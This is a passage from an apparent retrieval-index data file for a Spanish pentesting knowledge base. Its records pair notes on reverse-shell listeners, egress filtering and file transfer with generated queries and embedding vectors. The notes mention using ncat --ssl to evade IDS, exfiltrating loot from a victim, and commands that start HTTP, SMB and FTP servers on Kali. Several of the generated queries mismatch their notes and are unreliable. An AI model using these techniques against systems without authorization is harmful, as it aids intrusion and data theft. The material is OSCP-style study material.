0.11927, 0.06032, -0.10364, 0.02817, 0.05851, -0.02099, 0.05958, 0.0951, -0.07751, -0.10628, 0.05734, -0.05478, -0.11176, 0.03853, 0.05218, 0.00262, -0.05059, 0.0328, 0.00409, -0.02468, -0.05451, -0.03321, -0.07389, 0.03112, 0.02696, -0.10567, -0.04105, -0.11296, 0.0058, -0.02405, -0.15217, 0.09846, -0.04959, -0.00974, 0.04535, -0.01761, 0.04317, 0.03717, -0.01707, -0.06686, -0.02681, -0.07037, -0.04426, 0.07663, -0.0194, -0.01481, -0.01802, 0.01027, -0.01565, 0.03739, -0.04475, 0.05244, -0.02043, 0.08281, -0.09445, 0.01032, -0.03508, -0.03068, 0.03856, -0.09611, 0.0281, -0.0257, 0.05535, -0.02752, -0.00152, -0.03993, 0.00351, 0.03466, -0.03216, 0.00301, 0.02978, -0.051, -0.0473, -0.00793, -0.0765, 0.02408, 0.0191, 0.07404, 0.0503, 0.03989, -0.09834, 0.0093, -0.0297, -0.00717, -0.15161, 0.00716, 0.0278, -0.02408, 0.04449, -0.01623, -0.05046, 0.01099, -0.01447, 0.02596, -0.01876, 0.02119, 0.08685, 0.03409, -0.04293, -0.09298, -0.04223, -0.07407, -0.01541, -0.00767, -0.09407, 0.03027, 0.02801, -0.09311, 0.05223, 0.01923, -0.02857, -0.00489, 0.07825, 0.00706, -0.01368, 0.0104, -0.00742, 0.06155, 0.03069, 0.02483, 0.00461, -0.06382, -0.03008, -0.04299, 0.00033, -0.01615, -0.05227, 0.01827, -0.01494, 0.0156, 0.07201, -0.02333, -0.00528, 0.00782, 0.06495, 0.01699, -0.04726, 0.02678, -0.07659, 0.04636, 0.03046, -0.01089, -0.0408, 0.02075, -0.03225, -0.02, -0.03204, 0.06295, 0.0702, -0.02158, -0.01041, 0.01087, 0.01144, -0.05567, -0.01735, -0.02802, -0.03654, -0.01572, 0.00352, 0.00899, 0.02143, 0.0885, -0.02282]} +{"tipo": "pregunta", "herramienta": "Egress filtering", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Egress filtering.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Listener correcto segΓΊn objetivo\n```\nnc clΓ‘sico β†’ vΓ­ctima Linux\nncat --ssl β†’ evadir IDS\nstty raw -echo+nc β†’ Windows ConPtyShell\n```", "indexar": "como montar un shell interactivo sin eco en Windows?", "v": [0.0089, -0.09275, -0.19656, -0.04811, -0.0902, -0.06647, -0.12834, 0.01975, -0.01831, -0.20129, -0.08474, -0.08277, -0.02926, -0.077, 0.04959, 0.07131, 0.04285, -0.06259, -0.05211, 0.02774, -0.13669, -0.00124, -0.05559, -0.00475, 0.04197, 0.09877, -0.19674, 0.04863, -0.05325, 0.12937, 0.08229, 0.11137, 0.07531, -0.06008, -0.02836, -0.00405, 0.0329, -0.06956, 0.11097, -0.03209, -0.08386, 0.02966, -0.05332, 0.06855, 0.06724, -0.03328, 0.12525, -0.10019, 0.10568, 0.05209, -0.04231, 0.01918, -0.16487, 0.01521, 0.12142, -0.03973, 0.14013, -0.09752, 0.18505, -0.00925, -0.00696, 0.2308, 0.00724, 0.15006, 0.03899, 0.00781, -0.00707, 0.04096, -0.01569, 0.05252, -0.0027, -0.06053, 0.10864, -0.02942, 0.04192, 0.10808, -0.02764, -0.03727, 0.08505, 0.0686, 0.00472, 0.00098, 0.09665, -0.01858, -0.03796, -0.06757, -0.01186, -0.07583, -0.00524, -0.02124, 0.00288, -0.061, 0.02053, 0.04127, -0.0196, -0.10927, -0.04746, 0.0669, 0.02036, 0.1262, -0.11275, -0.04848, -0.08799, 0.01066, 0.04597, 0.02907, -0.04693, -0.06359, -0.03211, 0.09728, 0.07093, 0.10413, -0.01607, -0.04341, -0.00929, -0.03548, -0.03341, -0.06534, -0.01358, -0.01714, -0.12967, 0.0814, 0.01614, 0.01699, -0.00225, -0.02388, 0.02579, 0.09572, -0.08741, 0.03657, 0.06393, 0.02362, -0.02158, -0.03945, -0.07178, 0.05398, 0.00937, 0.02645, -0.04847, -0.05922, 0.05438, 0.07806, -0.00206, 0.0292, 0.01571, 0.07614, 0.04386, 0.01939, -0.04595, 0.02453, 0.0862, 0.0613, -0.02804, -0.00618, -0.04423, -0.03575, 0.03285, 0.12594, 0.05571, -0.0258, 0.03877, -0.03382, -0.01509, 0.0315, -0.0201, -0.0411, -0.06468, -0.0102, 0.01264, -0.03351, -0.01759, 0.08588, 0.00041, -0.02844, 0.02546, 0.04475, 0.02854, -0.01366, 0.02479, 0.02895, -0.05009, 0.02644, 0.0242, -0.03346, -0.05564, 0.0066, -0.01218, 0.02683, -0.0721, 0.05538, 0.05755, -0.00565, 0.017, 0.00995, 0.04383, -0.0446, -0.02199, -0.03522, 0.01447, 0.03679, -0.00545, 0.07632, -0.01611, -0.03156, 0.0992, 0.04126, -0.05495, 0.07543, 0.05697, 0.04096, -0.0138, -0.00661, 0.00566, 0.00686, 0.04306, -0.04663, 0.03718, 0.00231, -0.00393, 0.06092, 0.02424, 0.02668, 0.09905, 0.02478, 0.00261, -0.02842, -0.01396, -0.01642, 0.00176, -0.04008, -0.02173, -0.03026, 0.00718, 0.0103, 0.00837, 0.02711, 0.08306, -0.01357, -0.04966, -0.01652, -0.02177, 0.02812, 0.02249, -0.07646, -0.02716, -0.02581, -0.01843, 0.04645, 0.03949, -0.06708, -0.06333, -0.02163, -0.04111, -0.01288, -0.07098, 0.01762]} +{"tipo": "pregunta", "herramienta": "Egress filtering", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Egress filtering.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Regla\nDescubre el egress **pronto** (GestiΓ³n del tiempo): perder 2h pensando que el exploit no va, cuando es el firewall, es clΓ‘sico.\n\nRelacionado: Reverse shell Β· Puesto de mando Kali Β· OSCP MOC", "indexar": "que programa me ayuda a gestionar la gestiΓ³n del tiempo para pruebas de penetraciΓ³n?", "v": [0.02403, 0.15309, -0.09998, -0.32123, 0.06555, 0.04899, -0.06512, 0.02226, -0.01434, -0.05467, -0.07623, 0.03933, 0.01081, -0.05258, -0.04936, 0.01689, 0.06689, -0.08626, -0.01461, 0.04515, -0.01816, 0.0575, 0.01704, -0.04939, -0.04899, 0.06195, 0.06753, -0.0921, 0.00479, -0.07497, -0.06938, -0.06856, 0.00769, -0.07739, 0.02533, 0.04204, -0.03336, 0.05559, 0.09669, 0.15334, -0.0705, -0.05775, 0.05589, 0.0113, 0.20168, -0.05803, 0.11597, 0.00909, -0.02709, -0.06516, -0.12514, -0.05339, 0.00649, -0.05384, -0.00259, -0.11785, -0.01074, -0.15686, -0.05975, -0.06903, -0.06004, -0.01266, 0.02192, 0.04937, 0.08513, -0.01008, 0.15169, 0.02502, -0.07934, 0.11958, -0.04023, 0.04085, -0.00864, -0.06871, -0.08194, -0.10061, 0.12001, 0.09225, 0.02349, -0.10759, 0.03962, 0.03703, 0.02305, 0.05498, -0.08149, -0.02112, 0.02452, -0.04892, -0.01572, -0.05216, -0.0316, -0.10993, -0.00726, -0.029, 0.02807, 0.02472, 0.07361, -0.06885, 0.06033, 0.01647, 0.05539, -0.04182, -0.1368, 0.07646, -0.03332, 0.12726, 0.07374, -0.08405, -0.07867, 0.01324, -0.03124, -0.0103, -0.06151, -0.11162, -0.08116, 0.09221, 0.05498, -0.06778, -0.05181, -0.10193, -0.11013, -0.04736, -0.03775, 0.01793, 0.06341, -0.03543, 0.07845, 0.04148, 0.00049, 0.06801, -0.00599, 0.00845, -0.03021, 0.02692, -0.0095, -0.02095, -0.05788, 0.02034, -0.01102, -0.05066, -0.1065, 0.10273, 0.03142, 0.00951, 0.05751, -0.02152, -0.03288, -0.04205, 0.0327, 0.0715, 0.00406, -0.05015, 0.02369, 0.13985, -0.08033, -0.03627, 0.06186, 0.02171, -0.09552, 0.00585, -0.0684, -0.01193, -0.04759, -0.01931, 0.04954, 0.0101, 0.01427, 0.03413, 0.03187, 0.02922, -0.01994, 0.06671, 0.00364, -0.00317, 0.00151, -0.05412, 0.02541, -0.14461, -0.00792, -0.00424, -0.01033, 0.02225, 0.01689, 0.02062, 0.01114, -0.02913, -0.06687, 0.06335, -0.0189, 0.03271, 0.05878, -0.01209, -0.00021, 0.02892, 0.02055, -0.02201, -0.00868, 0.01889, -0.01532, -0.02494, -0.05925, -0.0725, 0.06596, 0.00345, -0.03518, 0.10038, -0.04795, 0.06664, 0.06466, 0.0295, 0.0159, 0.05337, 0.04211, -0.00082, -0.07105, -0.04295, 0.02178, 0.03403, -0.04197, -0.02596, -0.00062, 0.01485, 0.05815, 0.05129, -0.05448, -0.04238, 0.05438, 0.06399, 0.02764, 0.02493, 0.00353, -0.06049, 0.00347, -0.0139, 0.04552, -0.07132, 0.00143, -0.04017, 0.01768, -0.06848, -0.01351, 0.11495, 0.00578, 0.01772, -0.03881, -0.00113, -0.05194, -0.01797, -0.02906, -0.01191, -0.00944, 0.00386, -0.01234, -0.06706, 0.09605, -0.01227]} +{"tipo": "pregunta", "herramienta": "Egress filtering", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Egress filtering.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Regla\nDescubre el egress **pronto** (GestiΓ³n del tiempo): perder 2h pensando que el exploit no va, cuando es el firewall, es clΓ‘sico.\n\nRelacionado: Reverse shell Β· Puesto de mando Kali Β· OSCP MOC", "indexar": "con quΓ© herramienta puedo verificar rΓ‘pidamente si un exploit funciona o si el problema es el firewall?", "v": [-0.08688, 0.16319, -0.24752, -0.1522, -0.00425, -0.05817, -0.07863, 0.01247, -0.01479, -0.08509, -0.11089, -0.07715, -0.03967, -0.00086, 0.08246, -0.01636, -0.0555, -0.13438, 0.00242, -0.049, -0.01671, -0.06542, -0.02495, -0.14179, -0.12569, 0.13926, -0.05775, 0.03447, -0.18099, -0.09103, 0.05068, -0.02614, 0.12169, -0.06394, -0.1276, 0.09519, 0.00766, 0.08175, 0.15582, 0.09438, -0.00711, 0.05893, -0.03287, -0.03117, 0.0442, -0.03463, -0.10216, -0.06834, 0.0401, 0.06014, -0.05348, -0.13145, -0.09914, -0.0502, -0.04557, -0.06571, 0.12697, -0.08206, 0.05493, -0.07626, -0.17126, -0.08196, -0.00752, -0.0102, -0.01132, -0.1021, 0.03345, -0.06806, -0.0178, 0.07388, -0.04167, 0.0436, -0.05803, -0.00402, -0.06281, 0.00025, -0.00397, 0.00023, 0.0374, 0.0421, 0.07176, 0.05079, 0.03146, -0.05245, -0.1192, -0.13614, -0.05392, -0.10653, -0.01773, -0.10751, -0.03426, 0.1139, -0.00662, -0.01942, 0.02865, -0.02415, 0.08328, 0.02143, -0.07063, 0.00562, 0.09614, -0.05732, -0.11225, 0.0971, 0.00863, -0.02084, -0.01506, -0.05167, -0.07272, -0.05313, -0.0365, -0.01421, -0.0596, -0.05863, -0.06744, -0.01319, -0.08046, -0.07912, 0.0354, -0.00555, -0.05972, 0.03113, -0.06881, -0.03552, 0.03992, -0.00316, 0.0776, 0.0777, -0.00853, 0.00135, -0.02244, -0.06687, -0.08666, -0.00556, -0.05744, -0.06391, -0.0481, -0.1263, -0.02407, -0.05133, 0.05069, 0.00515, 0.02212, -0.06899, 0.06776, 0.0444, -0.07957, -0.07117, -0.08937, -0.01507, 0.03844, -0.03977, -0.00281, 0.08756, -0.05297, 0.00608, 0.03455, 0.04, -0.014, 0.06588, 0.04829, -0.03351, 0.059, 0.05745, -0.00769, -0.01031, 0.01071, 0.02606, 0.0986, 0.05512, -0.0213, 0.05332, 0.06234, -0.09758, 0.00254, -0.03516, -0.06236, 0.00044, 0.05351, -0.07083, -0.0579, 0.01435, 0.00441, -0.00307, -0.04962, -0.05778, 0.06277, -0.00382, -0.00338, 0.04003, 0.07137, 0.00792, 0.05148, -0.02206, 0.00484, -0.03416, -0.04482, -0.07308, 0.02774, -0.00423, -0.02136, -0.00764, 0.01425, -0.07291, 0.03458, 0.02953, -0.04698, -0.01798, 0.04196, 0.00447, 0.06292, 0.00351, 0.06242, -0.01534, -0.03286, 0.02364, -0.00414, 0.03548, -0.0193, -0.07734, 0.00814, 0.04265, 0.01359, 0.01153, -0.01591, 0.01799, -0.03008, 0.04518, 0.01522, 0.0464, 0.015, -0.01477, -0.05627, 0.03121, 0.05151, -0.05868, -0.01124, -0.04598, 0.00416, -0.02215, -0.00846, 0.02019, 0.04667, -0.00841, 0.01137, 0.01499, -0.02215, -0.05572, -0.02828, -0.06692, -0.03486, 0.00373, 0.03635, -0.0191, 0.05567, -0.00645]} +{"tipo": "pregunta", "herramienta": "Egress filtering", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Egress filtering.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Regla\nDescubre el egress **pronto** (GestiΓ³n del tiempo): perder 2h pensando que el exploit no va, cuando es el firewall, es clΓ‘sico.\n\nRelacionado: Reverse shell Β· Puesto de mando Kali Β· OSCP MOC", "indexar": "cual es una alternativa libre al programa que detecta problemas de egress en Kali?", "v": [-0.15369, 0.09153, -0.02218, -0.04635, -0.04685, -0.08725, -0.01383, 0.02159, -0.14383, -0.05743, -0.08907, -0.14318, -0.1584, 0.05733, 0.12608, -0.04717, 0.04624, -0.08806, 0.11193, -0.03009, -0.11262, -0.09885, 0.00026, -0.11264, -0.04788, 0.04261, -0.0782, 0.00367, -0.03074, -0.05223, -0.0378, -0.05706, -0.0008, -0.10667, -0.01693, 0.0687, 0.0316, 0.05866, 0.11469, 0.00965, 0.05107, -0.08332, -0.01312, -0.01954, 0.074, -0.12085, 0.00154, 0.02201, 0.01191, 0.0762, -0.12639, 0.0932, -0.02323, 0.02809, 0.13232, -0.12599, 0.02172, -0.06981, -0.03808, -0.06768, -0.09848, -0.01152, 0.02401, -0.03909, 0.07418, -0.06535, 0.05177, 0.05046, -0.08247, 0.04655, 0.10462, -0.01817, 0.02774, -0.0773, -0.12015, 0.08814, -0.07979, -0.00598, -0.05992, 0.00706, 0.0845, -0.0437, 0.02443, 0.12731, -0.11974, -0.14325, 0.08521, -0.10323, -0.05255, 0.05199, 0.04856, 0.10824, 0.04748, 0.13821, 0.0578, -0.07559, 0.13951, 0.0283, 0.01443, 0.15297, 0.10427, -0.04736, -0.09747, 0.02889, -0.06342, -0.00279, 0.01807, 0.03964, -0.0466, 0.01379, -0.06599, 0.01222, 0.04496, -0.04384, -0.08787, -0.01404, 0.00075, 0.05085, 0.02748, -0.04859, -0.08043, 0.00194, -0.03289, -0.08953, 0.04965, -0.03657, -0.0148, 0.00386, -0.03911, 0.10836, 0.02089, 0.00934, -0.03211, -0.08165, -0.08696, -0.07771, 0.02363, -0.05381, 0.00931, 0.05676, 0.01582, 0.05054, 0.06046, 0.01607, 0.03569, -0.04797, -0.04249, -0.05243, -0.0372, 0.05287, -0.04957, 0.01532, 0.06789, 0.13602, -0.05022, -0.00013, -0.01481, 0.02922, -0.06943, 0.06456, 0.01982, -0.00406, -0.03805, 0.0045, 0.0559, -0.0253, 0.00272, 0.04761, 0.0227, 0.05728, -0.01107, 0.13165, 0.10387, -0.11435, -0.01807, -0.04254, -0.01552, -0.12885, 0.05077, -0.02251, -0.09791, 0.08341, -0.04522, 0.0025, -0.03324, -0.04824, -0.012, 0.03607, 0.03362, 0.01679, -0.01096, -0.00447, -0.08208, -0.07852, -0.01662, 0.00172, 0.01348, -0.04842, 0.00367, -0.00666, -0.06253, 0.01063, 0.00815, -0.00492, -0.02128, 0.00658, -0.01806, 0.00928, 0.09341, 0.0539, 0.00123, 0.01659, 0.10522, 0.03712, -0.07639, -0.02293, 0.00602, 0.05232, 0.02655, 0.01641, -0.0004, 0.00049, 0.07327, 0.06634, -0.01937, -0.03619, 0.00229, 0.05334, 0.0106, 0.04684, 0.03814, -0.0362, -0.01099, -0.0156, 0.02103, -0.02893, 0.00667, -0.0021, 0.02211, -0.05845, 0.04988, 0.0412, 0.03306, -0.03352, -0.03222, 0.04202, -0.05049, -0.01149, -0.01451, -0.0008, -0.04889, 0.08101, 0.04872, -0.03175, 0.03171, 0.01958]} +{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Transferencia de ficheros\n\n> **Subes** tools a la vΓ­ctima y **exfiltras** loot. Montado en el Puesto de mando Kali. Matriz completa: oscp.trastero.org/filetransfer.", "indexar": "con que programa puedo subir herramientas y extraer archivos de una mΓ‘quina objetivo", "v": [0.07416, 0.02263, -0.17212, -0.22244, -0.02313, -0.08282, -0.09102, -0.03551, -0.06467, -0.13272, -0.16498, -0.0305, 0.02583, -0.06369, 0.03115, 0.02388, 0.07963, -0.07201, 0.01907, 0.06268, 0.06837, 0.05945, -0.04573, -0.09973, -0.03377, 0.03402, 0.01305, 0.09524, -0.21252, 0.04219, -0.00446, 0.1433, 0.11625, -0.07431, 0.03383, -0.11149, 0.01147, 0.09822, -0.00233, -0.04997, -0.00917, 0.02292, -0.13486, 0.02195, 0.08248, -0.06867, 0.12817, 0.00699, 0.04633, -0.00625, 0.0222, -0.0611, 0.03354, 0.01735, -0.02743, -0.15406, 0.07263, -0.1058, -0.01646, -0.04932, -0.02636, 0.06907, -0.06696, -0.01773, -0.07106, 0.0269, -0.02604, -0.02914, -0.14014, 0.10456, -0.02599, 0.00826, 0.09282, -0.02765, 0.01352, 0.00348, 0.00466, -0.05999, -0.01824, -0.13739, -0.03771, -0.00136, -0.01401, 0.06477, -0.10268, -0.06337, 0.08831, -0.03429, 0.01199, -0.09711, 0.05835, 0.04048, 0.05509, -0.0222, 0.09034, -0.02111, 0.14271, -0.01659, 0.03589, -0.00125, 0.07584, -0.10687, -0.00765, 0.18226, 0.00397, 0.10404, 0.07162, 0.03929, -0.03424, 0.01546, 0.03946, 0.03429, 0.03946, -0.01862, -0.12349, -0.02415, -0.07899, -0.01465, -0.04726, -0.08462, -0.00759, 0.05165, 0.03083, -0.02398, 0.07567, -0.07455, -0.03668, 0.12927, -0.07268, -0.05066, 0.06171, 0.12133, -0.01849, 0.0105, -0.04538, -0.08718, 0.0825, -0.07732, -0.04653, -0.10492, 0.02852, 0.05111, -0.06419, -0.0391, 0.06558, -0.05817, -0.02455, -0.0803, -0.0191, -0.07618, 0.02558, -0.02242, 0.09939, 0.0321, -0.04916, 0.02286, 0.02907, -0.06114, -0.09041, 0.01028, -0.11958, -0.02881, -0.04964, -0.03745, 0.00345, 0.02942, 0.02375, 0.0082, 0.05533, 0.00514, -0.01472, 0.02256, 0.06827, -0.02533, 0.01925, 0.04387, 0.00151, -0.09622, 0.06504, -0.04095, -0.07143, 0.05742, 0.02385, -0.03688, -0.05783, -0.07841, 0.02605, -0.02715, 0.01954, 0.01894, -0.03076, -0.01738, -0.04468, -0.04261, 0.00767, -0.02748, -0.04084, 0.08607, 0.06424, -0.02299, -0.05221, -0.00908, -0.01389, -0.01144, -0.02705, 0.07273, -0.03268, -0.06458, -0.01696, 0.05264, 0.01722, 0.00979, 0.06103, -0.06161, -0.0135, -0.00791, -0.01337, 0.03547, 0.02229, 0.02151, 0.01797, 0.00821, 0.0999, 0.05528, -0.01743, -0.04977, 0.01695, 0.04708, 0.02432, -0.01975, -0.05333, -0.01521, 0.03276, 0.00525, 0.00187, -0.00184, 0.03249, -0.00349, -0.03366, -0.04898, -0.03199, 0.05785, 0.05578, -0.04603, -0.05966, 0.02024, 0.00082, -0.00014, 0.00751, -0.0071, -0.00763, 0.04389, 0.01727, -0.01281, 0.00547, 0.05274]} +{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Transferencia de ficheros\n\n> **Subes** tools a la vΓ­ctima y **exfiltras** loot. Montado en el Puesto de mando Kali. Matriz completa: oscp.trastero.org/filetransfer.", "indexar": "que herramienta me permite transferir ficheros desde mi Kali para exfiltrar datos", "v": [-0.01489, 0.02209, -0.07637, -0.12463, 0.16617, -0.09576, -0.00254, 0.00202, -0.13056, -0.03408, -0.01669, -0.03026, 0.00766, -0.14591, 0.11353, 0.03895, 0.03295, -0.15342, 0.01597, -0.06522, 0.0027, 0.02536, -0.0537, -0.15925, -0.11393, -0.01392, 0.04816, -0.03806, -0.23049, -0.01124, 0.13974, 0.028, 0.07208, 0.0059, 0.06124, -0.02236, -0.02272, 0.04702, 0.01839, -0.0871, 0.10149, 0.08797, -0.05377, 0.10539, 0.00501, -0.08353, -0.11659, 0.03823, 0.1247, 0.0893, 0.10106, -0.16014, -0.13846, 0.02528, -0.10037, -0.16177, 0.16742, -0.1042, 0.06307, 0.03503, -0.07514, -0.043, -0.02531, 0.08918, 0.03344, -0.08105, 0.0791, -0.00734, -0.16329, 0.1383, 0.01132, 0.14486, 0.0083, -0.01614, -0.07833, -0.07093, 0.0394, 0.00053, -0.02604, 0.03027, 0.01024, -0.07361, -0.02306, -5e-05, 0.02329, 0.01426, 0.08856, -0.02725, -0.02159, -0.00513, 0.01743, -0.01027, 0.00059, 0.04642, 0.09912, 0.08531, -0.02863, 0.00559, -0.04862, -0.01124, 0.08542, 0.04455, -0.05124, 0.09368, -0.01488, 0.0172, -0.00494, -0.01716, -0.05321, -0.06819, 0.03907, 0.0044, 0.0549, -0.03076, 0.09317, 0.04911, 0.02198, -0.0262, -0.0403, -0.07397, 0.00151, -0.05337, -0.01088, -0.04207, -0.02519, -0.09744, -0.1177, 0.02723, -0.03522, 0.0174, -0.05397, 0.03733, -0.10948, -0.00518, 0.04829, -0.00919, -0.03067, -0.0683, 0.02536, -0.06671, -0.02336, 0.03182, -0.03889, 0.01585, -0.02866, -0.00498, -0.01435, 0.05543, -0.02492, -0.1039, 0.01981, -0.0538, -0.00475, 0.07104, -0.06223, 0.05239, 0.00277, -0.05225, -0.13579, -0.01972, -0.00039, 0.01042, 0.05441, -0.00132, 0.02245, -0.04255, 0.05778, -0.00501, 0.08312, 0.05749, -0.03637, 0.01167, 0.07061, -0.06597, 0.05526, -0.01529, -0.04584, -0.05926, 0.02323, -0.05029, -0.02354, 0.0209, -0.00489, 0.00039, -0.00383, -0.02798, -0.01254, -0.01395, 0.00799, -0.0056, -0.04264, 0.09424, 0.06712, -0.04943, 0.02635, -0.01347, -0.04654, -0.05244, 0.06595, 0.01876, -0.02155, 0.02763, -0.00298, -0.10166, -0.00866, 0.09933, -0.03828, -0.076, -0.02379, -0.01965, -0.03532, -0.00775, 0.08213, -0.01587, -0.02249, -0.00191, 0.01952, -0.00968, 0.00538, -0.00826, -0.02576, 0.01401, 0.07678, -0.03003, -0.04448, 0.04579, 0.02358, -0.02283, -0.0076, 0.01063, 0.01885, 0.0187, -0.00034, -0.04772, 0.08811, -0.0407, -0.04323, -0.07777, -0.05271, -0.03636, 0.01044, 0.03814, -0.01861, -0.05095, 0.01038, -0.00895, -0.07821, 0.0351, 0.01398, -0.10249, -0.01705, -0.01805, 0.07383, -0.05364, 0.0029, -0.05607]} +{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Transferencia de ficheros\n\n> **Subes** tools a la vΓ­ctima y **exfiltras** loot. Montado en el Puesto de mando Kali. Matriz completa: oscp.trastero.org/filetransfer.", "indexar": "quΓ© software sirve para montar la matriz completa de transferencia de loot en el puesto de mando", "v": [0.07085, 0.04762, -0.29372, -0.14519, -0.17368, 0.01308, 0.03755, 0.00932, -0.20752, -0.06385, -0.13585, -0.10831, 0.1502, -0.04906, 0.0053, 0.06714, 0.06364, -0.1197, -0.03387, -0.01903, 0.0003, -0.05393, 0.09845, -0.18635, -0.03009, 0.14727, 0.14132, -0.07001, -0.18201, 0.15149, 0.02045, -0.00467, -0.02931, 0.07608, 0.07786, -0.17636, 0.10282, -0.04596, -0.01002, 0.06792, 0.09944, -0.01629, -0.03849, -0.03168, 0.0187, -0.10445, 0.08649, 0.03325, 0.13644, 0.04156, 0.0696, -0.01124, -0.07446, -0.0175, 0.061, -0.12136, 0.0919, -0.03527, 0.09127, -0.05204, -0.10067, 0.08252, -0.08832, 0.02708, -0.01867, -0.05739, -0.00934, -0.05434, -0.09715, 0.05064, -0.01282, 0.04023, 0.04629, 0.01048, -0.04371, -0.02548, -0.05755, 0.06401, 0.0498, -0.01566, -0.00937, 0.00082, -0.08058, 0.0875, -0.07335, -0.06106, 0.10368, -0.02959, 0.10274, -0.02459, -0.02888, 0.06978, -0.05683, 0.05535, 0.08668, -0.03187, 0.02464, 0.03978, 0.06218, 0.0032, -0.02476, -0.05435, -0.09782, 0.10055, -0.03773, 0.0175, 0.0355, -0.05988, 0.05023, -0.03452, -0.02728, 0.03216, -0.01023, 0.00978, -0.03505, -0.07717, -0.00723, 0.02939, -0.00153, 0.01866, -0.05835, 0.02263, 0.04418, 0.02437, 0.01834, -0.05416, -0.01052, 0.11373, 0.00213, -0.01419, -0.01966, -0.07525, -0.08888, -0.02914, -0.0117, -0.07631, 0.04677, -0.00733, -0.02733, -0.05478, -0.03642, 0.01508, -0.01247, -0.10169, 0.04011, 0.05417, 0.10217, -0.10528, 0.00964, -0.0041, 0.00375, 0.06678, 0.02644, 0.02803, -0.05377, -0.0284, 0.02209, -0.01121, -0.07689, -0.01185, -0.04513, -0.01427, -0.02965, -0.01255, -0.04399, -0.04654, -0.02039, 0.02517, 0.00268, -0.0274, -0.06763, 0.06331, 0.02242, -0.04937, 0.00475, -0.02618, -0.07131, -0.0342, -0.01845, -0.03492, -0.00792, -0.00736, 0.03372, 0.03295, 0.03081, -0.03623, 0.02542, 0.02667, 0.00452, 0.09329, 0.01799, 0.00449, -0.05865, -0.00609, 0.03637, -0.01924, -0.06341, 0.0066, 0.01146, -0.02662, 0.00065, -0.0126, 0.00499, -0.01894, 0.06191, 0.02787, -0.01602, 0.05323, -0.01473, 0.11312, 0.0297, 0.00059, 0.07565, 0.02318, 0.0024, -0.00394, 0.00274, -0.00896, -0.02377, 0.01969, -0.02726, -0.03125, 0.00794, -0.01342, -0.04273, 0.05807, 0.0325, 0.02809, 0.08313, 0.04987, -0.00862, 0.03192, 0.0006, -0.01816, 0.00755, 0.01428, 0.00712, 0.02211, -0.01015, -0.04151, -0.01705, 0.06093, -0.0354, -0.0271, -0.05442, -0.01711, -0.08722, -0.01271, 0.02193, -0.03512, -0.05795, -0.00989, 0.02175, -0.02072, -9e-05, -0.01657]} +{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Servidores en tu Kali\n```bash\npython3 -m http.server 7788 # HTTP\nimpacket-smbserver -smb2support SERVER $(pwd) # SMB (anΓ³nimo)\nimpacket-smbserver -username u -password p -smb2support SERVER $(pwd) # SMB con auth\npython3 -m pyftpdlib --user=u --password=p -w -p 21 # FTP\nphp -S 0.0.0.0:7788 # PHP\n```", "indexar": "que programa puedo usar para montar un servidor HTTP localmente?", "v": [0.01077, 0.06673, -0.20959, -0.17333, -0.1013, -0.09211, 0.01536, -0.06833, -0.00309, -0.01549, -0.17681, 0.02472, 0.04689, -0.04562, 0.03491, 0.06244, 0.13614, -0.15709, 0.05912, -0.02198, -0.00529, 0.00674, -0.01052, -0.04605, -0.06649, 0.01269, 0.05575, -0.03835, -0.11645, -0.0882, 0.06064, 0.00314, -0.0346, 0.09953, -0.03852, -0.08518, -0.01114, 0.08746, -0.0172, 0.04629, 0.07083, 0.02266, -0.04568, 0.0245, -0.06356, 0.04587, 0.04604, -0.16079, 0.03782, -0.08275, 0.0192, -0.01163, -0.17667, 0.03377, -0.04116, 0.09463, 0.08381, -0.18493, 0.00935, -0.04251, -0.08226, -0.00146, -0.02339, 0.00443, 0.06349, -0.03783, -0.00375, 0.01948, -0.17083, -0.00576, -0.07371, 0.02634, 0.05343, -0.05831, 0.06023, 0.09192, -0.04522, -0.04073, 0.07769, 0.03321, 0.00925, 0.00753, 0.02574, 0.15086, -0.15978, -0.05051, 0.0292, -0.10471, 0.09472, -0.01054, 0.08281, 0.12232, -0.0376, 0.00876, 0.00555, -0.1299, 0.14653, 0.02979, 0.05338, 0.02879, 0.02467, 0.02272, -0.01687, 0.11674, 0.08958, 0.08857, 0.12668, -0.02445, 0.04082, -0.05708, 0.04302, 0.00253, -0.12823, 0.02655, -0.0778, -0.07341, 0.03394, 0.02998, 0.04396, -0.03403, -0.08586, -0.00094, -0.00207, 0.02465, 0.04795, -0.01596, 0.05679, 0.07376, -0.07882, 0.01596, -0.00675, -0.04401, -0.03741, 0.00386, -0.06585, 0.01826, 0.08887, -0.10049, -0.03317, 0.02127, 0.00491, -0.00338, -0.06925, 0.01242, 0.08885, 0.01752, 0.05577, -0.11847, -0.02818, 0.03028, 0.0825, 0.01148, -0.08317, 0.00508, -0.12635, -0.04121, 0.04531, -0.07198, -0.04725, 0.0805, 0.0316, 0.02175, 0.03617, 0.05738, 0.03316, 0.01308, -0.05617, 0.0588, 0.09902, 0.04505, 0.00599, 0.09952, 0.00113, -0.10208, 0.00064, -0.0128, -0.06301, -0.04536, 0.00842, 0.00062, -0.03426, 0.01027, 0.01648, 0.04259, -0.05013, -0.01368, 0.02873, 0.02781, -0.02427, 0.01909, -0.01169, 0.01383, -0.05556, 0.07524, 0.04057, -0.02728, -0.01739, -0.0065, 0.01384, -0.03016, -0.06354, -0.03661, -0.00575, -0.05844, 0.0194, 0.01243, -0.02533, 0.02834, 0.01669, 0.05654, -0.01219, -0.07304, 0.07914, -0.02986, 0.00038, 